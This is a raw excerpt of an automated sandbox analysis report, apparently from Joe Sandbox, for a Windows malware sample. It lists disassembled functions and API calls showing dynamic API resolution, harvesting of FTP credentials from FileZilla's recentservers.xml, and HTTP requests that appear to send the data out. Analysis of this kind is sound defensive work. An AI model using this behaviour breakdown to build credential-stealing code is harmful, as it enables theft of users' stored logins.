                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u42w.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ExitInfoProcessSystem
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 752954902-0
                                                                                                                                                                                                                              • Opcode ID: 0c78e0eb242a3f19764e03ad46aab426447ce2b04c76b8959ffb9729e3075d63
                                                                                                                                                                                                                              • Instruction ID: 30efb513975bfe185fa80fb3a8f84b393628ccfbb0aa9170a1b214bc368b0093
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0c78e0eb242a3f19764e03ad46aab426447ce2b04c76b8959ffb9729e3075d63
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B6D05E7490020C8BCB14DFE09A496DDBBB9AB8D711F001455DD0572240DA305441CA65
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,0098967F,?,00413068,?), ref: 004070F4
                                                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000,?,00413068,?), ref: 004070FB
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,02F61E60), ref: 004072AB
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,?), ref: 004072BF
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,?), ref: 004072D3
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,?), ref: 004072E7
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,02F653C8), ref: 004072FB
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,02F654B8), ref: 0040730F
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,02F654D0), ref: 00407322
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,02F654E8), ref: 00407336
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,02F61EE8), ref: 0040734A
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,?), ref: 0040735E
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,?), ref: 00407372
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,?), ref: 00407386
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,02F653C8), ref: 00407399
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,02F654B8), ref: 004073AD
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,02F654D0), ref: 004073C1
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,02F654E8), ref: 004073D4
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,02F664A8), ref: 004073E8
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,?), ref: 004073FC
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,?), ref: 00407410
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,?), ref: 00407424
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,02F653C8), ref: 00407438
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,02F654B8), ref: 0040744B
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,02F654D0), ref: 0040745F
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,02F654E8), ref: 00407473
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,02F66510), ref: 00407486
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,?), ref: 0040749A
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,?), ref: 004074AE
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,?), ref: 004074C2
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,02F653C8), ref: 004074D6
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,02F654B8), ref: 004074EA
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,02F654D0), ref: 004074FD
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,02F654E8), ref: 00407511
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,02F66578), ref: 00407525
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,?), ref: 00407539
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,?), ref: 0040754D
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,?), ref: 00407561
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,02F653C8), ref: 00407574
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,02F654B8), ref: 00407588
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,02F654D0), ref: 0040759C
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,02F654E8), ref: 004075AF
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,02F665E0), ref: 004075C3
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,?), ref: 004075D7
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,?), ref: 004075EB
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,?), ref: 004075FF
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,02F653C8), ref: 00407613
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,02F654B8), ref: 00407626
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,02F654D0), ref: 0040763A
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,02F654E8), ref: 0040764E
                                                                                                                                                                                                                                • Part of subcall function 00406FA0: lstrcat.KERNEL32(2F6A5020,0041DEB8), ref: 00406FD6
                                                                                                                                                                                                                                • Part of subcall function 00406FA0: lstrcat.KERNEL32(2F6A5020,00000000), ref: 00407018
                                                                                                                                                                                                                                • Part of subcall function 00406FA0: lstrcat.KERNEL32(2F6A5020, : ), ref: 0040702A
                                                                                                                                                                                                                                • Part of subcall function 00406FA0: lstrcat.KERNEL32(2F6A5020,00000000), ref: 0040705F
                                                                                                                                                                                                                                • Part of subcall function 00406FA0: lstrcat.KERNEL32(2F6A5020,0041DEC0), ref: 00407070
                                                                                                                                                                                                                                • Part of subcall function 00406FA0: lstrcat.KERNEL32(2F6A5020,00000000), ref: 004070A3
                                                                                                                                                                                                                                • Part of subcall function 00406FA0: lstrcat.KERNEL32(2F6A5020,0041DEC4), ref: 004070BD
                                                                                                                                                                                                                                • Part of subcall function 00406FA0: task.LIBCPMTD ref: 004070CB
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,02F61C20), ref: 004077DB
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,02F65BB0), ref: 004077EE
                                                                                                                                                                                                                              • lstrlen.KERNEL32(2F6A5020), ref: 004077FB
                                                                                                                                                                                                                              • lstrlen.KERNEL32(2F6A5020), ref: 0040780B
                                                                                                                                                                                                                                • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                • Part of subcall function 00404DC0: lstrlen.KERNEL32(00000000), ref: 00404E4A
                                                                                                                                                                                                                                • Part of subcall function 00404DC0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404EBB
                                                                                                                                                                                                                                • Part of subcall function 00404DC0: StrCmpCA.SHLWAPI(?,02F61B90), ref: 00404ED9
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u42w.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: lstrcat$lstrlen$Heap$AllocateInternetOpenProcesslstrcpytask
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3958002797-0
                                                                                                                                                                                                                              • Opcode ID: b5bdf3d81c3e92e67f42610897bd79d19ef9b07276fcf033d1f54a95a78769b8
                                                                                                                                                                                                                              • Instruction ID: 3e78b0701875fb024adfa953bd7607f570b92d72e3b87f8e208063dda3fe5bd2
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b5bdf3d81c3e92e67f42610897bd79d19ef9b07276fcf033d1f54a95a78769b8
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D33234B6D01A14ABCB35EBA0DC89DDE737DAB48704F404699B20A66090DF78E7C5CF94
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 187 40ea90-40eb22 call 416d40 call 4154e0 call 416f20 call 416ea0 call 416e00 * 2 call 416fb0 call 416ea0 call 416e00 call 416da0 call 4093a0 209 40eb27-40eb2c 187->209 210 40ef60-40ef73 call 416e00 call 413220 209->210 211 40eb32-40eb49 call 415530 209->211 211->210 217 40eb4f-40ebaf strtok_s call 416d40 * 4 GetProcessHeap HeapAlloc 211->217 227 40ebb2-40ebb6 217->227 228 40eeca-40ef5b lstrlen call 416da0 call 401500 call 404dc0 call 416e00 memset call 417040 * 4 call 416e00 * 4 227->228 229 40ebbc-40ebcd StrStrA 227->229 228->210 230 40ec06-40ec17 StrStrA 229->230 231 40ebcf-40ec01 lstrlen call 414fa0 call 416ea0 call 416e00 229->231 234 40ec50-40ec61 StrStrA 230->234 235 40ec19-40ec4b lstrlen call 414fa0 call 416ea0 call 416e00 230->235 231->230 237 40ec63-40ec95 lstrlen call 414fa0 call 416ea0 call 416e00 234->237 238 40ec9a-40ecab StrStrA 234->238 235->234 237->238 244 40ecb1-40ed03 lstrlen call 414fa0 call 416ea0 call 416e00 call 4170d0 call 4094a0 238->244 245 40ed39-40ed4b call 4170d0 lstrlen 238->245 244->245 288 40ed05-40ed34 call 416e20 call 416fb0 call 416ea0 call 416e00 244->288 262 40ed51-40ed63 call 4170d0 lstrlen 245->262 263 40eeaf-40eec5 strtok_s 245->263 262->263 273 40ed69-40ed7b call 4170d0 lstrlen 262->273 263->227 273->263 283 40ed81-40ed93 call 4170d0 lstrlen 273->283 283->263 292 40ed99-40eeaa lstrcat * 3 call 4170d0 lstrcat * 2 call 4170d0 lstrcat * 3 call 4170d0 lstrcat * 3 call 4170d0 lstrcat * 3 call 416e20 * 4 283->292 288->245 292->263
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                • Part of subcall function 004154E0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 0041550B
                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                                                                                                • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                • Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6
                                                                                                                                                                                                                                • Part of subcall function 004093A0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004093CC
                                                                                                                                                                                                                                • Part of subcall function 004093A0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 004093F1
                                                                                                                                                                                                                                • Part of subcall function 004093A0: LocalAlloc.KERNEL32(00000040,?), ref: 00409411
                                                                                                                                                                                                                                • Part of subcall function 004093A0: ReadFile.KERNEL32(000000FF,?,00000000,'@,00000000), ref: 0040943A
                                                                                                                                                                                                                                • Part of subcall function 004093A0: LocalFree.KERNEL32('@), ref: 00409470
                                                                                                                                                                                                                                • Part of subcall function 004093A0: FindCloseChangeNotification.KERNEL32(000000FF), ref: 0040947A
                                                                                                                                                                                                                                • Part of subcall function 00415530: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00415552
                                                                                                                                                                                                                              • strtok_s.MSVCRT ref: 0040EB5B
                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,000F423F,0041D77A,0041D777,0041D776,0041D773), ref: 0040EBA2
                                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041D772), ref: 0040EBA9
                                                                                                                                                                                                                              • StrStrA.SHLWAPI(00000000,<Host>), ref: 0040EBC5
                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 0040EBD3
                                                                                                                                                                                                                                • Part of subcall function 00414FA0: malloc.MSVCRT ref: 00414FA8
                                                                                                                                                                                                                                • Part of subcall function 00414FA0: strncpy.MSVCRT ref: 00414FC3
                                                                                                                                                                                                                              • StrStrA.SHLWAPI(00000000,<Port>), ref: 0040EC0F
                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 0040EC1D
                                                                                                                                                                                                                              • StrStrA.SHLWAPI(00000000,<User>), ref: 0040EC59
                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 0040EC67
                                                                                                                                                                                                                              • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 0040ECA3
                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 0040ECB5
                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041D772), ref: 0040ED42
                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000,?,?,00000000), ref: 0040ED5A
                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000,?,?,00000000), ref: 0040ED72
                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000,?,?,00000000), ref: 0040ED8A
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,browser: FileZilla), ref: 0040EDA2
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,profile: null), ref: 0040EDB1
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,url: ), ref: 0040EDC0
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 0040EDD3
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0041DD34), ref: 0040EDE2
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 0040EDF5
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0041DD38), ref: 0040EE04
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,login: ), ref: 0040EE13
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 0040EE26
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0041DD44), ref: 0040EE35
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,password: ), ref: 0040EE44
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 0040EE57
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0041DD54), ref: 0040EE66
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0041DD58), ref: 0040EE75
                                                                                                                                                                                                                              • strtok_s.MSVCRT ref: 0040EEB9
                                                                                                                                                                                                                              • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041D772), ref: 0040EECE
                                                                                                                                                                                                                              • memset.MSVCRT ref: 0040EF17
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u42w.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: lstrcat$lstrlen$lstrcpy$AllocFileLocal$Heapstrtok_s$ChangeCloseCreateFindFolderFreeNotificationPathProcessReadSizemallocmemsetstrncpy
                                                                                                                                                                                                                              • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                                                                                                                                                                                                              • API String ID: 1266801029-555421843
                                                                                                                                                                                                                              • Opcode ID: 77b85b58d8f0edf8d244f222085a076d4fa4c57e7be74b854093ff4431b00f64
                                                                                                                                                                                                                              • Instruction ID: d9186ee441f73b04c887f2efee86d04259a2264df0fa853aa1509dbc15227f06
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 77b85b58d8f0edf8d244f222085a076d4fa4c57e7be74b854093ff4431b00f64
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3FD174B5D00208ABCB14EBF1DD56EEE7739AF44304F50851EF106B6095DF38AA85CBA8
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 322 415ed0-415ee4 call 415dc0 325 416103-416162 LoadLibraryA * 5 322->325 326 415eea-4160fe call 415df0 GetProcAddress * 21 322->326 327 416164-416178 GetProcAddress 325->327 328 41617d-416184 325->328 326->325 327->328 331 4161b6-4161bd 328->331 332 416186-4161b1 GetProcAddress * 2 328->332 333 4161d8-4161df 331->333 334 4161bf-4161d3 GetProcAddress 331->334 332->331 335 4161e1-4161f4 GetProcAddress 333->335 336 4161f9-416200 333->336 334->333 335->336 337 416231-416232 336->337 338 416202-41622c GetProcAddress * 2 336->338 338->337
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,02F46B38), ref: 00415F11
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,02F614B0), ref: 00415F2A
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,02F61750), ref: 00415F42
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,02F61648), ref: 00415F5A
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,02F616D8), ref: 00415F73
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,02F60C18), ref: 00415F8B
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,02F608B0), ref: 00415FA3
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,02F60650), ref: 00415FBC
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,02F61720), ref: 00415FD4
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,02F61708), ref: 00415FEC
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,02F61678), ref: 00416005
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,02F61600), ref: 0041601D
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,02F60950), ref: 00416035
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,02F61618), ref: 0041604E
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,02F61630), ref: 00416066
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,02F608D0), ref: 0041607E
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,02F614C8), ref: 00416097
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,02F61738), ref: 004160AF
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,02F60710), ref: 004160C7
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,02F61498), ref: 004160E0
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,02F60610), ref: 004160F8
                                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(02F61660,?,004136C0), ref: 0041610A
                                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(02F614F8,?,004136C0), ref: 0041611B
                                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(02F614E0,?,004136C0), ref: 0041612D
                                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(02F61528,?,004136C0), ref: 0041613F
                                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(02F61510,?,004136C0), ref: 00416150
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75A70000,02F615E8), ref: 00416172
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75290000,02F615B8), ref: 00416193
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75290000,02F61768), ref: 004161AB
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75BD0000,02F61780), ref: 004161CD
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75450000,02F60630), ref: 004161EE
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(76E90000,02F60C28), ref: 0041620F
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 00416226
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              • NtQueryInformationProcess, xrefs: 0041621A
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u42w.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AddressProc$LibraryLoad
                                                                                                                                                                                                                              • String ID: NtQueryInformationProcess
                                                                                                                                                                                                                              • API String ID: 2238633743-2781105232
                                                                                                                                                                                                                              • Opcode ID: 4bf4faa6d80337b6a8c58e308678245154ae8b5c2676724c8d6fcdc68551e2bc
                                                                                                                                                                                                                              • Instruction ID: 1024ce913f91588aaf476b7e35ab3ad31cc185c195c2877b0ef9f81f7e935ec9
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4bf4faa6d80337b6a8c58e308678245154ae8b5c2676724c8d6fcdc68551e2bc
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4CA16FB5910E10AFC374DFA8FE88A1637BBBBCC3117116519A60AC72A0DF759482CF95
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 339 404dc0-404ee1 call 416da0 call 404470 call 4155a0 call 4170d0 lstrlen call 4170d0 call 4155a0 call 416d40 * 5 InternetOpenA StrCmpCA 362 404ee3 339->362 363 404eea-404eee 339->363 362->363 364 404ef4-405007 call 415260 call 416f20 call 416ea0 call 416e00 * 2 call 416fb0 call 416f20 call 416fb0 call 416ea0 call 416e00 * 3 call 416fb0 call 416f20 call 416ea0 call 416e00 * 2 InternetConnectA 363->364 365 405578-40560a InternetCloseHandle call 415070 * 2 call 417040 * 4 call 416da0 call 416e00 * 5 call 413220 call 416e00 363->365 364->365 428 40500d-40501b 364->428 429 405029 428->429 430 40501d-405027 428->430 431 405033-405065 HttpOpenRequestA 429->431 430->431 432 40556b-405572 InternetCloseHandle 431->432 433 40506b-4054e5 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 4170d0 lstrlen call 4170d0 lstrlen GetProcessHeap HeapAlloc call 4170d0 lstrlen call 4170d0 memcpy call 4170d0 lstrlen memcpy call 4170d0 lstrlen call 4170d0 * 2 lstrlen memcpy call 4170d0 lstrlen call 4170d0 HttpSendRequestA call 415070 431->433 432->365 587 4054ea-405514 InternetReadFile 433->587 588 405516-40551d 587->588 589 40551f-405565 InternetCloseHandle 587->589 588->589 590 405521-40555f call 416fb0 call 416ea0 call 416e00 588->590 589->432 590->587
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6
                                                                                                                                                                                                                                • Part of subcall function 00404470: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004044F6
                                                                                                                                                                                                                                • Part of subcall function 00404470: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404506
                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 00404E4A
                                                                                                                                                                                                                                • Part of subcall function 004155A0: CryptBinaryToStringA.CRYPT32(00000000,>N@,40000001,00000000,00000000), ref: 004155C0
                                                                                                                                                                                                                                • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                              • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404EBB
                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,02F61B90), ref: 00404ED9
                                                                                                                                                                                                                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404FF4
                                                                                                                                                                                                                              • HttpOpenRequestA.WININET(00000000,02F61B60,?,02F66870,00000000,00000000,00400100,00000000), ref: 00405058
                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000,00000000,?,",00000000,?,02F61BD0,00000000,?,02F41E78,00000000,?,0041E098,00000000,?,00410996), ref: 004053EB
                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 004053FF
                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 00405410
                                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 00405417
                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 0040542C
                                                                                                                                                                                                                              • memcpy.MSVCRT ref: 00405443
                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 0040545D
                                                                                                                                                                                                                              • memcpy.MSVCRT ref: 0040546A
